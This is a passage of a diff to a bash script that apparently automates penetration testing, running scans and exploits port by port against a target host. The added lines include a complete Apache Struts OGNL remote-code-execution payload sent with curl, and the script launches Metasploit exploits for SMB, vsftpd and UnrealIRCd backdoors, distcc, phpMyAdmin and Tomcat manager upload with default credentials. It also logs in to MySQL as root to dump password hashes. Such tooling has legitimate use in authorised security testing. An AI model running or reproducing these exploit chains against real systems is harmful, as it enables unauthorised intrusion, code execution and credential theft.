 	
 	if [ $SCAN_TYPE == "DOMAIN" ];
 	then
-		echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
-		goohak $TARGET > /dev/null
+		if [ "$GOOHAK" = "0" ]; then
+			echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
+		else
+			echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
+			goohak $TARGET > /dev/null
+		fi		
 		echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
 		php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
 		rm -Rf output/ cookie.txt exploits.conf
@@ -723,7 +892,7 @@ then
 	echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=pop* -p 110 $TARGET
+	nmap -A -sV  -T5 --script=pop* -p 110 $TARGET
 fi
 
 if [ -z "$port_111" ];
@@ -755,7 +924,7 @@ else
 	enum4linux $TARGET
 	python $SAMRDUMP $TARGET
 	nbtscan $TARGET
-	nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	nmap -A -sV  -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
 	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
 fi
 
@@ -820,6 +989,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
 	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
 	echo ""
@@ -861,7 +1033,7 @@ else
 	if [ "$MODE" = "web" ];
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		nmap -A -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb https://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -873,22 +1045,38 @@ else
 		echo ""
 		python $CMSMAP -t https://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
-		uniscan -u https://$TARGET -qweds
+		if [ $ARACHNI == "1" ];
+		then
+			echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
+		else
+			echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+			mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
+			arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
+			cd $INSTALL_DIR/loot/web/$TARGET-https/
+			arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
+			unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
+			cd $INSTALL_DIR
+		fi
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
 		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
 		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
+		echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
+		curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
 	fi
 	
 	if [ $SCAN_TYPE == "DOMAIN" ];
 	then
 		if [ -z $GHDB ];
 		then
-			echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
-			goohak $TARGET > /dev/null
+			if [ "$GOOHAK" = "0" ]; then
+				echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
+			else
+				echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
+				goohak $TARGET > /dev/null
+			fi		
 			echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
 			php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
 			rm -Rf output/ cookie.txt exploits.conf
@@ -907,7 +1095,7 @@ else
 	enum4linux $TARGET
 	python $SAMRDUMP $TARGET
 	nbtscan $TARGET
-	nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	nmap -A -sV  -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
 	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
 fi
 
@@ -940,7 +1128,7 @@ then
 	echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
+	nmap -A -sV -T5 --script=ms-sql* -p 1433 $TARGET
 fi
 
 if [ -z "$port_2049" ];
@@ -948,7 +1136,7 @@ then
 	echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
+	nmap -A -sV  -T5 --script=nfs* -p 2049 $TARGET
 	rpcinfo -p $TARGET
 	showmount -e $TARGET
 	smbclient -L $TARGET -U " "%" "
@@ -959,7 +1147,7 @@ then
 	echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
+	nmap -A -sV  -T5 --script=ftp* -p 2121 $TARGET
 	msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi
 
@@ -968,7 +1156,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
-	nmap -A -sV --script=mysql* -p 3306 $TARGET
+	nmap -A -sV  --script=mysql* -p 3306 $TARGET
 	mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
 fi
 
@@ -977,7 +1165,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
-	nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
+	nmap -A -p 3310 -T5 -sV  --script clamav-exec $TARGET
 fi
 
 if [ -z "$port_3128" ];
@@ -985,7 +1173,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
-	nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
+	nmap -A -p 3128 -T5 -sV  --script=*proxy* $TARGET
 fi
 
 if [ -z "$port_3389" ];
@@ -993,7 +1181,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
+	nmap -A -sV  -T5 --script=rdp-* -p 3389 $TARGET
 	rdesktop $TARGET &
 fi
 
@@ -1002,16 +1190,36 @@ then
 	echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
+	nmap -A -sV  -T5 --script=distcc-* -p 3632 $TARGET
 	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
 fi
 
+if [ -z "$port_8443" ];
+then
+	echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
+	wafw00f http://$TARGET:4443
+	echo ""
+	whatweb http://$TARGET:4443
+	echo ""
+	xsstracer $TARGET 4443
+	sslscan --no-failed $TARGET:4443
+	sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
+	cd $PLUGINS_DIR/MassBleed
+	./massbleed $TARGET port 4443
+	cd $INSTALL_DIR
+	nikto -h https://$TARGET:4443 
+	cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
+	nmap -sV  -A -p 4443 -T5 --script=*proxy* $TARGET
+fi
+
 if [ -z "$port_5432" ];
 then
 	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
-	nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
+	nmap -A -sV  --script=pgsql-brute -p 5432 $TARGET
 fi
 
 if [ -z "$port_5800" ];
@@ -1019,7 +1227,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
+	nmap -A -sV  -T5 --script=vnc* -p 5800 $TARGET
 fi
 
 if [ -z "$port_5900" ];
@@ -1027,7 +1235,16 @@ then
 	echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
+	nmap -A -sV  -T5 --script=vnc* -p 5900 $TARGET
+fi
+
+if [ -z "$port_5984" ];
+then
+	echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
+	nmap -A -sV  -T5 --script=couchdb* -p 5984 $TARGET
+	msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
 fi
 
 if [ -z "$port_6000" ];
@@ -1035,7 +1252,8 @@ then
 	echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
+	nmap -A -sV  -T5 --script=x11* -p 6000 $TARGET
+	msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
 fi
 
 if [ -z "$port_6667" ];
@@ -1043,7 +1261,7 @@ then
 	echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
+	nmap -A -sV  -T5 --script=irc* -p 6667 $TARGET
 	msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
 fi
 
@@ -1060,6 +1278,7 @@ else
 	cd ..
 	nikto -h http://$TARGET:8000 
 	cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
 fi
 
 if [ -z "$port_8100" ];
@@ -1078,6 +1297,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8100 
 	cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
 fi
 
 if [ -z "$port_8080" ];
@@ -1096,7 +1316,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8080 
 	cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
-	nmap -A -p 8080 -T5 --script=*proxy* $TARGET
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
 	# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
 	# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1119,7 +1339,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8180 
 	cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
-	nmap -p 8180 -T5 --script=*proxy* $TARGET
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1142,7 +1362,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h https://$TARGET:8443 
 	cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
-	nmap -A -p 8443 -T5 --script=*proxy* $TARGET
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
 fi
 
 if [ -z "$port_8888" ];
@@ -1157,6 +1377,7 @@ else
 	xsstracer $TARGET 8888
 	nikto -h http://$TARGET:8888 
 	cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
+	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse  -A -p 8888 -T5 $TARGET
 fi
 
 if [ -z "$port_10000" ];
@@ -1169,6 +1390,38 @@ else
 	msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
 fi
 
+if [ -z "$port_27017" ];
+then
+	echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
+	nmap -sV --script  -p 27017 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_27018" ];
+then
+	echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
+	nmap -sV  -p 27018 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_27019" ];
+then
+	echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
+	nmap -sV  -p 27019 -T5 --script=mongodb* $TARGET
+fi
+
+if [ -z "$port_28017" ];
+then
+	echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
+	nmap -sV  -p 28017 -T5 --script=mongodb* $TARGET
+fi
+
 if [ -z "$port_49152" ];
 then
 	echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
@@ -1182,6 +1435,13 @@ cd $PLUGINS_DIR/yasuo
 ruby yasuo.rb -r $TARGET -b all
 cd $SNIPER_DIR
 
+if [ "$FULLNMAPSCAN" = "0" ]; then
+	echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
+else
+	echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
+	nmap -T4 -sV  -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+fi
+
 if [ "$AUTOBRUTE" = "0" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
 else
@@ -1192,6 +1452,8 @@ else
 	rm -f scan.log
 	echo ""
 fi
-loot
+
+rm -f $LOOT_DIR/.fuse_* 2> /dev/null
+
 echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 exit 0